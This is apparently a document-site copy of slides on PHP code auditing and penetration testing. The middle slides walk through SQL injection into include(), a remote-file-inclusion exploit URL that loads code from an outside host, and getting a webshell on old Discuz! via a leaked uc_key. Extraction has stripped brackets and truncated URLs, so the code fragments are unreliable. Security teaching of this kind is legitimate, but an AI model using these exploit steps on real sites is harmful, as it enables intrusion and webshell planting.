版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
1、WEB代碼審計與滲透測試http:/ WEB應(yīng)用程序代碼審計l程序的兩大根本:變量與函數(shù)l漏洞現(xiàn)成的條件: A、可以控制的變量 【一切輸入都是有害的 】 B、變量到達有利用價值的函數(shù)危險函數(shù) 【一切進入函數(shù)的變量是有害的】l漏洞的利用效果取決于最終最終函數(shù)的功能 變量進入什么樣的函數(shù)就導(dǎo)致什么要的效果PHP應(yīng)用程序代碼審計l為什么只是PHP? A、跨平臺、應(yīng)用廣泛、復(fù)雜 B、變量處理靈活如變量覆蓋、全局變量等 C、函數(shù)庫巨大 導(dǎo)致漏洞類型多,既有通用的又有特有的 E、代碼審計的思路是可以通用的變量變量l預(yù)定義變量常規(guī)外部提交的變量 GPC $_ENV/SERVER/SESSION $HTTP_
2、RAW_POST_DATA等lregister_globals = on 未初始化的變量 PHP 4.20 默認為offl變量覆蓋未初始化及覆蓋前定義的變量 如:extract() 、遍歷初始化變量、遍歷初始化變量、parse_str()等等l變量的傳遞與存儲中轉(zhuǎn)的變量 存儲于數(shù)據(jù)庫、文件如配置、緩存文件等危險函數(shù)l文件包含包含漏洞l代碼執(zhí)行執(zhí)行任意代碼漏洞l命令執(zhí)行執(zhí)行任意命令漏洞l文件系統(tǒng)操作文件(目錄)讀寫等漏洞l數(shù)據(jù)庫操作SQL注射漏洞l數(shù)據(jù)顯示 XSS等客服端漏洞l更多的變量處理與危險函數(shù)高級高級PHP應(yīng)用程序漏洞審核技術(shù)應(yīng)用程序漏洞審核技術(shù)http:/ 變量跟蹤的過程l通過變量找函
3、數(shù)正向跟蹤變量 $id=$_GETid$sid=$id函數(shù)($sid)l通過函數(shù)找變量逆向跟蹤變量 函數(shù)($sid) $sid=$id $id=$_GETid變量的傳遞與二次漏洞l變量存儲、提取、傳遞是一個復(fù)雜的立體的過程l過程中經(jīng)過多個不一樣的函數(shù)的處理后繼續(xù)傳遞,最終達到漏洞函數(shù)l傳遞的過程中任意環(huán)節(jié)可控就可能導(dǎo)致漏洞l中間函數(shù)處理的過程誕生新的變量,新的變量達到新的漏洞函數(shù)誕生新的漏洞二次漏洞二次漏洞l什么是二次漏洞? 2006年提出的一個概念 主導(dǎo)思想:通過一個現(xiàn)有漏洞,創(chuàng)造新的漏洞使得漏洞利用最大化l一個demo注意:include與require的區(qū)別二次漏洞l又一個demo一個注
4、射漏洞$sql= select id,filepath,user,name from attachment where fileid=$_GETid”; $result = mysql_db_query($dbname, $sql);$file=mysql_fetch_array($result); 然而:include($filefilepath);一個貌似不可以直接控制的新變量$filefilepath進入了危險函數(shù)include()?id=1 union select 1,http:/ ver遠程包含漏洞單獨看上面的代碼是沒有辦法提交 實現(xiàn)遠程包含Exp:/admin/index.php
5、?_SERVERConfigFile=./commonlib/pages/importcsv.php&GLOBALSassign_invalid_default=1&GLOBALScoderoot=http:/xx.xx.xx.xx/實現(xiàn)了一次完美的又本地包含轉(zhuǎn)為遠程包含的又一個實例:Discuz!old ver遠程代碼執(zhí)行漏洞 效果圖:【實現(xiàn)“給我一個注射點,我給你一個shell”的目標(biāo)】注射得到uc_key中.利用uc-key得到webshell代碼執(zhí)行得到webshell的關(guān)鍵在于dz論壇的api借口里:api/uc.php里updateapps()對配置文件config
6、.inc.php有讀寫操作繼續(xù)跟下updateapps()的調(diào)用:$get的處理:整過只要得到了uc_key就可以通過調(diào)用updateapps()對config.inc.php寫操作了!另外updateapps()的2個參數(shù)都沒有魔術(shù)引號的處理:$get = _stripslashes($get);$post = xml_unserialize(file_get_contents(php:/input);數(shù)據(jù)流不受魔術(shù)引號限制通過$configfile = preg_replace(“/define(UC_API,s*.*?);/i”, “define(UC_API, $UC_API);”,
7、$configfile); 閉合define(UC_API, 來注射我們的webshell代碼二次漏洞的啟示l漏洞的類型是可以轉(zhuǎn)換的:最終的目的是攻擊效果最大化!l一切進入函數(shù)的變量是有害的:變量在傳遞過程任意個環(huán)節(jié)可控就可能導(dǎo)致漏洞!l變量傳遞的途徑是多樣的:我們的攻擊思路多元化! 如對于dz,去尋找可以找到uc_key的途徑:sql注射、文件讀取config.inc.php里存有uc_key、控制mysql的管理權(quán)限phpmyadmin等等二次漏洞的其他應(yīng)用l應(yīng)用級別的“rootkit”其他的因素與代碼審計lphp版本與代碼審計變量與函數(shù) php.ini默認設(shè)置問題 php本身函數(shù)的漏洞p
8、hp缺少自動升級的機制l系統(tǒng)特性與系統(tǒng)特性與代碼審計 包括OS: 主要是文件操作 web服務(wù)器: 主要文件解析類型 系統(tǒng)特性與系統(tǒng)特性與web安全安全 http:/ 甲方的代碼審計: 目的:防御 要求:找到更多的漏洞,并且給出安全補丁建議等。并且對應(yīng)用程序平臺無特別要求。 乙方的代碼審計: 目的:滲透也就是進攻 要求:找到一個可用的漏洞就可以,但是要求快速、利用效果最大化等。并且要求在滲透測試目標(biāo)的平臺上可以利用。滲透測試中的代碼審計代碼審計前的準(zhǔn)備 A.得到代碼 a.對于開源的應(yīng)用程序:得到程序的版本信息,越詳細越好。 *具體應(yīng)用程序版本掃描 b.對于不開源的應(yīng)用程序: *通過黑盒掃描得到備
9、用文件 *通過黑盒掃描利用sql注射暴代碼loadfile() *通過黑盒掃描利用容易文件下載漏洞 *上一次滲透測試打包下載的代碼 B.得到平臺信息 php版本及php.ini一些基本設(shè)置、OS信息、Web服務(wù)信息、數(shù)據(jù)庫應(yīng)用滲透測試中的代碼審計快速代碼審計: A.補丁對比技術(shù) B.業(yè)務(wù)功能與漏洞 C.相似性漏洞挖掘 D.基于白盒的fuzz E.常用變量與函數(shù) F.高級的代碼審計A 補丁對比技術(shù)l二進制補丁對比技術(shù)已經(jīng)非常成熟開始于2004年 ,也誕生了反二進制對比的技術(shù)。lPHP應(yīng)用程序補丁對比技術(shù) *基于源代碼,對比起來更加直觀明了 *目前還沒有對應(yīng)的反對比機制 *對比工具: 系統(tǒng)命令:f
10、c、diff等 專業(yè)工具:Beyond Compare、UltraCompare等 *常見的安全補丁方式: 變量初始化:$str=;、$arr=array();等 變量過濾: intval/int()、addslashes()、正則等 *對比的版本選擇:選取臨近的版本避免一些非安全補丁的干擾一個實例B 業(yè)務(wù)功能與漏洞l實現(xiàn)業(yè)務(wù)功能的同時引入安全風(fēng)險。如: 上傳功能上傳漏洞 數(shù)據(jù)存儲與查詢sql注射漏洞 后臺或者api接口安全認證繞過 數(shù)據(jù)庫備用導(dǎo)出webshelll新的功能必定帶來新的安全隱患。l功能越強大說明漏洞幾率越大。l我們在審計代碼的同時應(yīng)該熟悉應(yīng)用程序的業(yè)務(wù)功能。C 相似性漏洞挖掘l
11、天下武學(xué)同出少林天大代碼一把抄 最經(jīng)典的故事屬于asp:動網(wǎng)的上傳漏洞l每個程序員都有自己的代碼風(fēng)格習(xí)慣 不好的風(fēng)格習(xí)慣,可能代碼致命的安全漏洞,而且習(xí)慣很難改變!l相同的功能帶來同樣的漏洞 如后臺的功能和api接口實現(xiàn)相同的功能l尋找相似性漏洞 *通過補丁對比技術(shù) *通過漏洞分析、總結(jié)漏洞類型D 基于白盒的fuzz 當(dāng)然也用于其他get、post的變量、甚至是環(huán)境變量,比如注射用戶名、發(fā)帖的標(biāo)題內(nèi)容設(shè)置為一個特征字符2、對于數(shù)據(jù)庫存儲查詢可以讓數(shù)據(jù)庫出錯的字符就行 比如 D 基于白盒的fuzz 的情況下,在inlculdes的文件里設(shè)定的配置變量沒有初始化的問題:那么不是所有的文件都這樣的問題,我們可以先通過白盒找到這些可能出現(xiàn)問題的變量名,然后可以寫個fuzz的腳本,列表程序
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2024年深圳職業(yè)技術(shù)學(xué)院高職單招職業(yè)適應(yīng)性測試歷年參考題庫含答案解析
- 二零二五年度高速公路橋梁養(yǎng)護勞務(wù)承包協(xié)議3篇
- rA公路工程施工測量教學(xué)文案
- 2024年浙江紡織服裝職業(yè)技術(shù)學(xué)院高職單招職業(yè)技能測驗歷年參考題庫(頻考版)含答案解析
- 九年級數(shù)學(xué)上冊第一章特殊平行四邊形11菱形的性質(zhì)與判定第3課時菱形的性質(zhì)判定與其他知識的綜合作業(yè)課件新版北師大版
- 2024年瀘州職業(yè)技術(shù)學(xué)院高職單招職業(yè)技能測驗歷年參考題庫(頻考版)含答案解析
- 2024年河南護理職業(yè)學(xué)院高職單招職業(yè)技能測驗歷年參考題庫(頻考版)含答案解析
- 2024年河北化工醫(yī)藥職業(yè)技術(shù)學(xué)院高職單招職業(yè)技能測驗歷年參考題庫(頻考版)含答案解析
- 2024年江西青年職業(yè)學(xué)院高職單招語文歷年參考題庫含答案解析
- 二零二五年度新型環(huán)保材料研發(fā)與市場推廣合同3篇
- 2024年慶陽市人民醫(yī)院高層次衛(wèi)技人才招聘筆試歷年參考題庫頻考點附帶答案
- 車間現(xiàn)場防錯培訓(xùn)課件
- 專題03 首字母填空15篇-沖刺2024年中考英語必考題型終極預(yù)測(廣州專用)
- 數(shù)字媒體技術(shù)基礎(chǔ)知識單選題100道及答案解析
- 全國職業(yè)院校技能大賽高職組(生產(chǎn)事故應(yīng)急救援賽項)選拔賽考試題庫500題(含答案)
- 電工電子技術(shù) 課件-電工電子技術(shù) 第2章
- 無痛分娩與鎮(zhèn)痛管理制度
- 2025屆中考英語復(fù)習(xí)課件(外研版廣西專用)13-八年級(下)Modules 1-2
- 2024-2025學(xué)年年八年級數(shù)學(xué)人教版下冊專題整合復(fù)習(xí)卷第11章 全等三角形單元試卷(含答案)
- 軟科職教:2024年度中國高職院校升本分析報告
- 華電考試初級理論復(fù)習(xí)試題及答案
評論
0/150
提交評論